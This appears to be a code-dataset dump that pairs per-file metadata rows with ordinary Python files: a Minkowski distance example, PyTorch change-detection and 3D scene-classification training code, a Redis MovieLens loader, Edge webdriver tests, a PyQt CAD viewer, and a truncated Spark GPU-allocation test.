| 27.83 | 135 | 0.605821 | 360 | 2,783 | 4.647222 | 0.358333 | 0.025105 | 0.020921 | 0.028691 | 0.075314 | 0.044232 | 0.044232 | 0 | 0 | 0 | 0 | 0.02649 | 0.240388 | 2,783 | 99 | 136 | 28.111111 | 0.764901 | 0.045994 | 0 | 0.088235 | 0 | 0.014706 | 0.169591 | 0.014035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014706 | false | 0 | 0.102941 | 0 | 0.132353 | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2bfb757a8bcdcb0b66778c0046b5270e30b43fb | 418 | py | Python | Distances/minkowski.py | TheWorstOne/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | 5 | 2021-04-21T00:41:04.000Z | 2022-03-09T06:57:00.000Z | Distances/minkowski.py | magabydelgado/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | null | null | null | Distances/minkowski.py | magabydelgado/numpy-formulas | 093657d4a23dfe82685595254aae50e0c6e46afb | [
"Unlicense"
] | 2 | 2021-06-22T03:04:54.000Z | 2022-03-16T18:59:33.000Z | import numpy as np
'''
Minkowski distance is a distance/ similarity measurement between two points
in the normed vector space (N dimensional real space) and is a generalization of
the Euclidean distance and the Manhattan distance.
'''
objA = [22, 1, 42, 10]
objB = [20, 0, 36, 8]
h = 3
npA = np.array(objA)
npB = np.array(objB)
minkowski = (np.abs(npA - npB) ** h).sum() ** (1/h)
print(minkowski) | 19.904762 | 85 | 0.667464 | 66 | 418 | 4.227273 | 0.666667 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045593 | 0.212919 | 418 | 21 | 86 | 19.904762 | 0.802432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c0747825eeba5177fcc34ea86ece6fc2eb3214 | 3,550 | py | Python | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | networks/cp_generator.py | rfww/EfficientChangeDetection | 42d466c56ed262980c27fd6cde6ffe65314e638f | [
"BSD-Source-Code"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.utils import model_zoo
from torchvision import models
class SegNetEnc(nn.Module):
def __init__(self, in_channels, out_channels, scale_factor,num_layers):
super().__init__()
layers = [
nn.Upsample(scale_factor=scale_factor, mode='bilinear'),
nn.Conv2d(in_channels, in_channels // 2, 3, padding=1),
nn.BatchNorm2d(in_channels // 2),
nn.ReLU(inplace=True),
]
layers += [
nn.Conv2d(in_channels // 2, in_channels // 2, 3, padding=1),
nn.BatchNorm2d(in_channels // 2),
nn.ReLU(inplace=True),
] * num_layers
layers += [
nn.Conv2d(in_channels // 2, out_channels, 3, padding=1),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
]
self.encode = nn.Sequential(*layers)
def forward(self, x):
return self.encode(x)
class Geneator(nn.Module):
def __init__(self, in_channels):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(in_channels, in_channels * 2, 1, padding=0),
nn.BatchNorm2d(in_channels * 2),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 2, in_channels * 2, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 2),
nn.ReLU(inplace=True),
)
self.layer2 = nn.Sequential(
nn.Conv2d(in_channels * 2, in_channels * 4, 1, padding=0),
nn.BatchNorm2d(in_channels * 4),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 4, in_channels * 4, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 4),
nn.ReLU(inplace=True),
)
self.layer3 = nn.Sequential(
nn.Conv2d(in_channels * 4, in_channels * 8, 1, padding=0),
nn.BatchNorm2d(in_channels * 8),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels * 8, in_channels * 8, 3, padding=1),
nn.MaxPool2d(2,2),
nn.BatchNorm2d(in_channels * 8),
nn.ReLU(inplace=True),
)
def forward(self, x):
out1 = self.layer1(x)
out2 = self.layer2(out1)
out3 = self.layer3(out2)
return out1, out2, out3
class CCP_Generator(nn.Module):
def __init__(self,in_dim,out_dim):
super().__init__()
self.sgp= SegNetEnc(in_dim*(2+4+8),out_dim,1,1)
self.ccp_G = Geneator(in_dim)
self.pr1 = nn.Sequential(
nn.Conv2d(in_dim*2,in_dim*2,3,1,1),
nn.BatchNorm2d(in_dim*2),
nn.ReLU(inplace=True)
)
self.pr2 = nn.Sequential(
nn.Conv2d(in_dim*4,in_dim*4,3,1,1),
nn.BatchNorm2d(in_dim*4),
nn.ReLU(inplace=True)
)
self.pr3 = nn.Sequential(
nn.Conv2d(in_dim*8,in_dim*8,3,1,1),
nn.BatchNorm2d(in_dim*8),
nn.ReLU(inplace=True)
)
def forward(self, x, y):
x1, x2, x3 = self.ccp_G(x)
y1, y2, y3 = self.ccp_G(y)
pr1 = self.pr1(abs(x1-y1))
pr2 = self.pr2(abs(x2-y2))
pr3 = self.pr3(abs(x3-y3))
ccp = self.sgp(torch.cat([
F.upsample_bilinear(pr1, scale_factor=0.5),
pr2,
F.upsample_bilinear(pr3, scale_factor=2)
],1))
return ccp
| 31.981982 | 75 | 0.541408 | 468 | 3,550 | 3.931624 | 0.153846 | 0.146739 | 0.065217 | 0.11087 | 0.591848 | 0.568478 | 0.45163 | 0.308152 | 0.288587 | 0.166304 | 0 | 0.058305 | 0.328451 | 3,550 | 110 | 76 | 32.272727 | 0.713507 | 0 | 0 | 0.315789 | 0 | 0 | 0.002254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063158 | false | 0 | 0.063158 | 0.010526 | 0.189474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c217a6d6cc0f9b87b8034e2a9420e72704039c | 2,156 | py | Python | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 789 | 2019-08-26T11:20:33.000Z | 2022-03-31T05:12:20.000Z | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 569 | 2019-08-22T12:45:59.000Z | 2022-03-27T09:08:39.000Z | solutions/recommender_system/quick_deploy/movie_recommender/to_redis.py | kilianovski/bootcamp | 8f3a753592ecb931815fde068f6377485e3fbe79 | [
"Apache-2.0"
] | 450 | 2019-08-09T10:12:14.000Z | 2022-03-27T12:30:36.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# !/bin/env python
import redis
import json
import codecs
#1::Toy Story (1995)::Animation|Children's|Comedy
def process_movie(lines, redis_cli):
for line in lines:
if len(line.strip()) == 0:
continue
tmp = line.strip().split("::")
movie_id = tmp[0]
title = tmp[1]
genre_group = tmp[2]
tmp = genre_group.strip().split("|")
genre = tmp
movie_info = {"movie_id" : movie_id,
"title" : title,
"genre" : genre
}
redis_cli.set("{}##movie_info".format(movie_id), json.dumps(movie_info))
#1::F::1::10::48067
def process_user(lines, redis_cli):
for line in lines:
if len(line.strip()) == 0:
continue
tmp = line.strip().split("::")
user_id = tmp[0]
gender = tmp[1]
age = tmp[2]
job = tmp[3]
zip_code = tmp[4]
user_info = {"user_id": user_id,
"gender": gender,
"age": age,
"job": job,
"zip_code": zip_code
}
redis_cli.set("{}##user_info".format(user_id), json.dumps(user_info))
if __name__ == "__main__":
r = redis.StrictRedis(host="127.0.0.1", port="6379")
with codecs.open("users.dat", "r",encoding='utf-8',errors='ignore') as f:
lines0 = f.readlines()
process_user(lines0, r)
with codecs.open("movies.dat", "r",encoding='utf-8',errors='ignore') as f:
lines0 = f.readlines()
process_movie(lines0, r)
| 32.666667 | 80 | 0.594156 | 294 | 2,156 | 4.238095 | 0.44898 | 0.048154 | 0.020867 | 0.025682 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0.194222 | 0 | 0.030632 | 0.273191 | 2,156 | 65 | 81 | 33.169231 | 0.764518 | 0.308905 | 0 | 0.232558 | 0 | 0 | 0.095853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0 | 0.069767 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c25a1adbdfbb794164973860e4a11af311fb29 | 1,679 | py | Python | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | tests/test_edge_driver.py | miguelius/webdriver_manager | d19805bb5a0d23b5f2b1bf997de1e7f8d494a0be | [
"Apache-2.0"
] | null | null | null | import os
import pytest
from selenium import webdriver
from webdriver_manager.microsoft import EdgeChromiumDriverManager
def test_edge_manager_with_selenium():
driver_path = EdgeChromiumDriverManager().install()
driver = webdriver.Edge(executable_path=driver_path, capabilities={})
driver.get("http://automation-remarks.com")
driver.quit()
def test_edge_manager_with_wrong_version():
with pytest.raises(ValueError) as ex:
driver_path = EdgeChromiumDriverManager(
version="0.2",
os_type='win64',
).install()
driver = webdriver.Edge(executable_path=driver_path)
driver.quit()
assert (
"There is no such driver by url "
"https://msedgedriver.azureedge.net/0.2/edgedriver_win64.zip"
) in ex.value.args[0]
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'linux64', 'mac64'])
def test_can_download_edge_driver(os_type):
path = EdgeChromiumDriverManager(os_type=os_type).install()
assert os.path.exists(path)
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'mac64', 'linux64'])
def test_can_get_edge_driver_from_cache(os_type):
EdgeChromiumDriverManager(os_type=os_type).install()
driver_path = EdgeChromiumDriverManager(os_type=os_type).install()
assert os.path.exists(driver_path)
@pytest.mark.parametrize('os_type', ['win32', 'win64', 'mac64', 'linux64'])
@pytest.mark.parametrize('specific_version', ['86.0.600.0'])
def test_edge_with_specific_version(os_type, specific_version):
bin_path = EdgeChromiumDriverManager(
version=specific_version,
os_type=os_type,
).install()
assert os.path.exists(bin_path)
| 31.092593 | 75 | 0.720071 | 207 | 1,679 | 5.584541 | 0.304348 | 0.077855 | 0.072664 | 0.041522 | 0.432526 | 0.394464 | 0.356401 | 0.324394 | 0.237889 | 0.205882 | 0 | 0.028169 | 0.154258 | 1,679 | 53 | 76 | 31.679245 | 0.785915 | 0 | 0 | 0.157895 | 0 | 0 | 0.142942 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.131579 | false | 0 | 0.105263 | 0 | 0.236842 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c2b4d3e04511ca0faea6250d8ead039b4f7eea | 3,691 | py | Python | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | CAMOnion/cadgraphicsview.py | JonRob812/CAMOnion | fcc0fce9ca0f7e170e2a06d1083995e9ef3d475a | [
"MIT"
] | null | null | null | import argparse
import signal
import sys
from functools import partial
from typing import Optional
from PyQt5 import QtWidgets as qw, QtCore as qc, QtGui as qg
import ezdxf
from ezdxf.addons.drawing import Frontend, RenderContext
from ezdxf.addons.drawing.pyqt import _get_x_scale, PyQtBackend, CorrespondingDXFEntity, \
CorrespondingDXFEntityStack
from ezdxf.drawing import Drawing
class CADGraphicsView(qw.QGraphicsView):
def __init__(self, view_buffer: float = 0.2):
super().__init__()
self._zoom = 1
self._default_zoom = 1
self._zoom_limits = (0.5, 100)
self._view_buffer = view_buffer
self.setTransformationAnchor(qw.QGraphicsView.AnchorUnderMouse)
self.setResizeAnchor(qw.QGraphicsView.AnchorUnderMouse)
self.setVerticalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOff)
self.setDragMode(qw.QGraphicsView.ScrollHandDrag)
self.setFrameShape(qw.QFrame.NoFrame)
self.setRenderHints(qg.QPainter.Antialiasing | qg.QPainter.TextAntialiasing | qg.QPainter.SmoothPixmapTransform)
def clear(self):
pass
def fit_to_scene(self):
r = self.sceneRect()
bx, by = r.width() * self._view_buffer / 2, r.height() * self._view_buffer / 2
self.fitInView(self.sceneRect().adjusted(-bx, -by, bx, by), qc.Qt.KeepAspectRatio)
self._default_zoom = _get_x_scale(self.transform())
self._zoom = 1
def _get_zoom_amount(self) -> float:
return _get_x_scale(self.transform()) / self._default_zoom
def wheelEvent(self, event: qg.QWheelEvent) -> None:
# dividing by 120 gets number of notches on a typical scroll wheel. See QWheelEvent documentation
delta_notches = event.angleDelta().y() / 120
zoom_per_scroll_notch = 0.2
factor = 1 + zoom_per_scroll_notch * delta_notches
resulting_zoom = self._zoom * factor
if resulting_zoom < self._zoom_limits[0]:
factor = self._zoom_limits[0] / self._zoom
elif resulting_zoom > self._zoom_limits[1]:
factor = self._zoom_limits[1] / self._zoom
self.scale(factor, factor)
self._zoom *= factor
class CADGraphicsViewWithOverlay(CADGraphicsView):
element_selected = qc.pyqtSignal(object, qc.QPointF)
graphics_view_clicked = qc.pyqtSignal(object)
def __init__(self, parent=None):
super().__init__()
self._current_item: Optional[qw.QGraphicsItem] = None
self.setParent(parent)
def clear(self):
super().clear()
self._current_item = None
def drawForeground(self, painter: qg.QPainter, rect: qc.QRectF) -> None:
if self._current_item is not None:
# if self._current_item.
if self._current_item.isEnabled():
r = self._current_item.boundingRect()
r.setHeight(r.height()-.1)
r = self._current_item.sceneTransform().mapRect(r)
painter.fillRect(r, qg.QColor(0, 255, 0, 100))
def mouseMoveEvent(self, event: qg.QMouseEvent) -> None:
pos = self.mapToScene(event.pos())
self._current_item = self.scene().itemAt(pos, qg.QTransform())
self.element_selected.emit(self._current_item, pos)
# print(self.element_selected, pos)
self.scene().invalidate(self.sceneRect(), qw.QGraphicsScene.ForegroundLayer)
super().mouseMoveEvent(event)
def mousePressEvent(self, event: qg.QMouseEvent) -> None:
if self._current_item:
self.graphics_view_clicked.emit(self._current_item)
print(event.pos())
super().mousePressEvent(event)
| 39.265957 | 120 | 0.680574 | 435 | 3,691 | 5.544828 | 0.335632 | 0.036484 | 0.068408 | 0.028192 | 0.089967 | 0.021559 | 0 | 0 | 0 | 0 | 0 | 0.012128 | 0.218098 | 3,691 | 93 | 121 | 39.688172 | 0.823631 | 0.041181 | 0 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.013514 | 0.135135 | 0.013514 | 0.337838 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2c4307644ca13cda4b784e9d220eb73eec8492b | 13,191 | py | Python | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | 6 | 2019-09-25T05:19:52.000Z | 2021-11-03T02:01:45.000Z | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | null | null | null | train.py | sogithuby/ragc | 08d64d7604e19b60a976d0a698fbfba555738bdc | [
"MIT"
] | 3 | 2020-04-07T11:27:29.000Z | 2021-07-16T20:43:38.000Z | """
Residual Attention Graph Convolutional network for Geometric 3D Scene Classification
2019 Albert Mosella-Montoro <albert.mosella@upc.edu>
"""
import torch
import torch_geometric
import torch.nn as nn
import random
import numpy as np
import os
import sys
import math
import argparse
from tqdm import tqdm
import functools
import ast
import utils
import metrics
import graph_model as models
from tensorboardX import SummaryWriter
from h53dclass_dataloader import H53DClassDataset
import gc
def train(model, loader, loss_criteron, optimizer, label_names, batch_parts=0, cuda = True):
model.train()
numIt = len(loader)
loader = tqdm(loader, ncols=100)
acc = metrics.AverageMeter()
losses = metrics.AverageMeter()
cm = metrics.ConfusionMatrixMeter(label_names, cmap='Oranges')
prev = -1
optimizer.zero_grad()
for i, batch in enumerate(loader, start = 0):
if cuda: batch = batch.to('cuda:0')
outputs = model(batch)
out_device = outputs.device
gt = batch.y.to(out_device)
loss = loss_criterion(outputs, gt)
loss.backward()
batch_size = len(torch.unique(batch.batch))
losses.update(loss.item(), batch_size)
cm.add(gt.cpu().data.numpy(), outputs.cpu().data.numpy())
if (i+1) % batch_parts == 0 or (i+1) == numIt:
if batch_parts>1:
accum = i-prev
prev = i
for p in model.parameters():
p.grad.div_(accum)
optimizer.step()
optimizer.zero_grad()
torch.cuda.empty_cache()
return losses.avg, cm
def val(model, loader, loss_criterion, label_names, cuda = True):
model.eval()
loader = tqdm(loader, ncols=100)
losses = metrics.AverageMeter()
cm = metrics.ConfusionMatrixMeter(label_names, cmap='Blues')
with torch.no_grad():
for i, batch in enumerate(loader, start = 0):
if cuda: batch = batch.to('cuda:0')
batch_size = len(batch.batch.unique())
outputs = model(batch)
out_device = outputs.device
gt = batch.y.to(out_device)
loss = loss_criterion(outputs, gt)
batch_size = len(torch.unique(batch.batch))
losses.update(loss.item(), batch_size)
cm.add(gt.cpu().data.numpy(), outputs.cpu().data.numpy())
loader.set_postfix({"loss" : loss.item()})
torch.cuda.empty_cache()
return losses.avg, cm
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='AGC')
# Optimization arguments
parser.add_argument('--optim', default='adam', type=str, choices=['sgd','adam'], help='optimizer')
parser.add_argument('--wd', default=5e-4, type=float, help='Weight decay')
parser.add_argument('--lr', default=1e-3, type=float, help='Learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='Momentum')
parser.add_argument('--betas', default='(0.9,0.999)', help = "Betas of adam optimizer")
parser.add_argument('--epochs', default=200, type=int, help='Number of epochs to train. ')
parser.add_argument('--batch_size', default=64, type=int, help='Batch size')
parser.add_argument('--batch_parts', default=8, type=int, help='Batch parts')
# Learning process arguments
parser.add_argument('--cuda', default=1, type=int, help='Bool, use cuda')
parser.add_argument('--multigpu', default=0, type=int, help='Bool, use multigpu')
parser.add_argument('--lastgpu', default=0,type=int, help='Parameter to indicate what is the last gpu used')
parser.add_argument('--nworkers', default=4, type=int, help='Num subprocesses to use for data loading')
# Dataset
parser.add_argument('--dataset_path', default ='', type=str, help = "Folder name that contains the h5 files")
parser.add_argument('--dataset_folder', default = '', type=str, help = "Folder name that contains the h5 files")
parser.add_argument('--train_split', default = 'list/train_list.txt', type=str, help = "Train split list path")
parser.add_argument('--test_split', default = '/list/test_list.txt', type=str, help = "Test split list path")
parser.add_argument('--nfeatures', default='1', help='Number of features of point clouds')
parser.add_argument('--className',default='list/scenes_labels.txt', help = 'Path to the file that contains the name of the classes')
parser.add_argument('--dataset', default='nyu_v1', help='Dataset name')
# Results
parser.add_argument('--odir', default='./results', help='Directory to store results')
parser.add_argument('--exp_name', default='Scene_Categorization', help='Name of the experiment')
# Model
parser.add_argument('--model_config', default='', help='Defines the model as a sequence of layers.')
parser.add_argument('--seed', default=1, type=int, help='Seed for random initialisation')
# Point cloud processing
parser.add_argument('--pc_augm_input_dropout', default=0, type=float, help='Training augmentation: Probability of removing points in input point clouds')
parser.add_argument('--pc_augm_scale', default=0, type=float, help='Training augmentation: Uniformly random scaling in [1/scale, scale]')
parser.add_argument('--pc_augm_rot', default=1, type=int, help='Training augmentation: Bool, random rotation around z-axis')
parser.add_argument('--pc_augm_mirror_prob', default=0.5, type=float, help='Training augmentation: Probability of mirroring about x or y axes')
parser.add_argument('--pc_attribs', default='', type=str, help='Edge attribute definition')
parser.add_argument('--coordnode', default=0, type=int, help='Put coordinates in node feature')
# Filter generating network
parser.add_argument('--fnet_widths', default='[]', help='List of width of hidden filter gen net layers')
parser.add_argument('--fnet_llbias', default=0, type=int, help='Bool, use bias in the last layer in filter gen net')
parser.add_argument('--fnet_orthoinit', default=1, type=int, help='Bool, use orthogonal weight initialization for filter gen net')
parser.add_argument('--fnet_dropout', default=0, type=int, help='Int, use of dropout for filter gen net')
parser.add_argument('--fnet_batchnorm', default=0, type=int, help='Bool, use of batchnorm for filter gen net')
# agc
parser.add_argument('--agc_bias', default=0, type=int, help='Bool, use bias in agc ')
args = parser.parse_args()
args.fnet_widths = ast.literal_eval(args.fnet_widths)
args.betas = ast.literal_eval(args.betas)
# Seeding
utils.seed(args.seed)
# creating experiment folder and init path for checkpoints, logs, etc
exp_path = os.path.join(args.odir, args.dataset, args.dataset_folder, args.exp_name.replace(" ","_"))
print("The experiment will save to " + exp_path)
utils.create_folder(args.odir)
utils.create_folder(exp_path)
log_path = os.path.join(exp_path, 'log')
utils.create_folder(log_path)
log_train_path = os.path.join(log_path, 'train')
utils.create_folder(log_train_path)
log_test_path = os.path.join(log_path, 'test')
utils.create_folder(log_test_path)
checkpoint_path = os.path.join(exp_path, 'checkpoints')
utils.create_folder(checkpoint_path)
cm_path = os.path.join(exp_path, 'cm')
utils.create_folder(cm_path)
# saving command line used on this experiment
with open(os.path.join(exp_path, 'cmdline.txt'), 'w') as f:
f.write(" ".join(sys.argv))
# Tensorboard writters
train_writer = SummaryWriter(log_train_path)
test_writer = SummaryWriter(log_test_path)
# creating_model
features = int(args.nfeatures)
model = models.GraphNetwork(args.model_config, features, args.multigpu,
args.fnet_widths, args.fnet_orthoinit,
args.fnet_llbias, default_edge_attr=args.pc_attribs,
default_agc_bias=args.agc_bias,
default_fnet_dropout=args.fnet_dropout,
default_fnet_batchnorm=args.fnet_batchnorm)
if args.multigpu != 1 and args.cuda != 0:
model.to('cuda:0')
print("GPU: ", torch.cuda.get_device_name(0))
print(model)
# optims
if args.optim == "adam":
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, betas=args.betas, weight_decay=args.wd)
elif args.optim == "sgd":
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum = args.momentum, weight_decay=args.wd)
loss_criterion = torch.nn.CrossEntropyLoss()
#creating DATABASE
label_path = os.path.join(args.dataset_path, args.className)
if not os.path.isfile(label_path):
raise RuntimeError("label file does not exists")
label_names = utils.read_string_list(label_path)
assert args.batch_size % args.batch_parts == 0
transform3d = {"dropout" : args.pc_augm_input_dropout,
"scale" : args.pc_augm_scale,
"rot" : args.pc_augm_rot,
"mirror" : args.pc_augm_mirror_prob}
train_dataset = H53DClassDataset(args.dataset_path, args.dataset_folder,
args.train_split, transform3d = transform3d,
coordnode = args.coordnode)
test_dataset = H53DClassDataset(args.dataset_path, args.dataset_folder,
args.test_split,coordnode=args.coordnode)
train_loader = torch_geometric.data.DataLoader(train_dataset,
batch_size = int(args.batch_size/args.batch_parts),
num_workers = args.nworkers,
shuffle = True,
drop_last = True,
pin_memory=True
)
test_loader = torch_geometric.data.DataLoader(test_dataset,
batch_size = int(args.batch_size/args.batch_parts),
num_workers = args.nworkers,
shuffle = False,
pin_memory=True
)
is_best = False
best_acc = 0
start_epoch = 0
for epoch in range(start_epoch, args.epochs):
print('Epoch {}/{} ({}):'.format(epoch, args.epochs, args.exp_name))
train_loss, train_cm = train(model, train_loader,
loss_criterion,
optimizer,
label_names,
batch_parts=args.batch_parts,
cuda = args.cuda)
train_acc = train_cm.accuracy()
gpu_mem_train = utils.max_gpu_allocated()
train_writer.add_scalar('Loss', train_loss, epoch)
train_writer.add_scalar('Accuracy', train_acc, epoch)
train_writer.add_scalar('Learning_Rate', utils.get_learning_rate(optimizer)[0], epoch)
for i in range(0, torch.cuda.device_count()):
train_writer.add_scalar('GPU%02d_Memory' %i, gpu_mem_train[i], epoch)
torch.cuda.empty_cache()
print('-> Train:\tAccuracy: {}, \tLoss: {}'.format(train_acc, train_loss))
test_loss, test_cm = val(model, test_loader,
loss_criterion,
label_names,
cuda = args.cuda)
test_acc = test_cm.accuracy()
gpu_mem_test = utils.max_gpu_allocated()
test_writer.add_scalar('Loss', test_loss, epoch)
test_writer.add_scalar('Accuracy', test_acc, epoch)
for i in range(0, torch.cuda.device_count()):
test_writer.add_scalar('GPU%02d_Memory' %i, gpu_mem_test[i], epoch)
torch.cuda.empty_cache()
print('-> Test:\tAccuracy: {}, \tLoss: {}'.format(test_acc, test_loss))
is_best = test_acc > best_acc
if is_best:
best_acc = test_acc
test_writer.add_text('Best Accuracy', str(np.round(best_acc.item(), 2)), epoch)
utils.save_checkpoint(epoch, model, optimizer, test_acc, is_best, best_acc,
checkpoint_path, save_all=False)
cm_file_name = os.path.join(cm_path, "cm_epoch_%i.npy" % epoch)
test_cm.save_npy(cm_file_name)
if math.isnan(test_loss) or math.isnan(train_loss): break
del test_loss, test_acc, test_cm, train_loss, train_acc, train_cm, gpu_mem_train, gpu_mem_test
gc.collect()
train_writer.close()
test_writer.close()
| 43.534653 | 157 | 0.613145 | 1,625 | 13,191 | 4.783385 | 0.200615 | 0.040525 | 0.076547 | 0.013508 | 0.328702 | 0.253441 | 0.22025 | 0.176766 | 0.15824 | 0.108581 | 0 | 0.008967 | 0.272913 | 13,191 | 302 | 158 | 43.678808 | 0.801481 | 0.034038 | 0 | 0.206573 | 0 | 0 | 0.158723 | 0.005191 | 0 | 0 | 0 | 0 | 0.004695 | 1 | 0.00939 | false | 0 | 0.084507 | 0 | 0.103286 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2cdfe4d7758eb0b52547db2002c039a639a0bf1 | 3,341 | py | Python | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | 1 | 2022-03-30T15:16:39.000Z | 2022-03-30T15:16:39.000Z | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | null | null | null | tests/common/test_spark_inference_common.py | nateagr/ml-hadoop-experiment | a821199f5321019d6e2bcfb9c4979b66d2d14324 | [
"Apache-2.0"
] | 1 | 2022-03-14T09:19:54.000Z | 2022-03-14T09:19:54.000Z | import os
import tempfile
import fcntl
from contextlib import contextmanager
import json
from typing import Dict, List
import mock
import pytest
from ml_hadoop_experiment.common.spark_inference import get_cuda_device, CUDA_DEVICE_ENV
def test_get_cuda_device_without_allocation():
with tempfile.NamedTemporaryFile() as lock_tmp, \
tempfile.TemporaryDirectory() as tmp_dir, \
_file_locking_mock():
allocation_tmp = os.path.join(tmp_dir, "allocation")
device = get_cuda_device(
n_gpus=3, lock_file=lock_tmp.name, allocation_file=allocation_tmp
)
assert device == 0
@pytest.mark.parametrize(
"alloc_map,pid,expected_cuda_device",
[
({0: [2]}, 1, 1),
({1: [2]}, 2, 1),
({0: [2], 2: [1]}, 3, 1),
({0: [2], 1: [3], 2: [1]}, 4, 0),
({0: [1, 2], 1: [3], 2: [4, 5]}, 6, 1)
]
)
def test_get_cuda_device_with_existing_allocations(alloc_map, pid, expected_cuda_device):
all_pids = []
for pids in alloc_map.values():
all_pids.extend(pids)
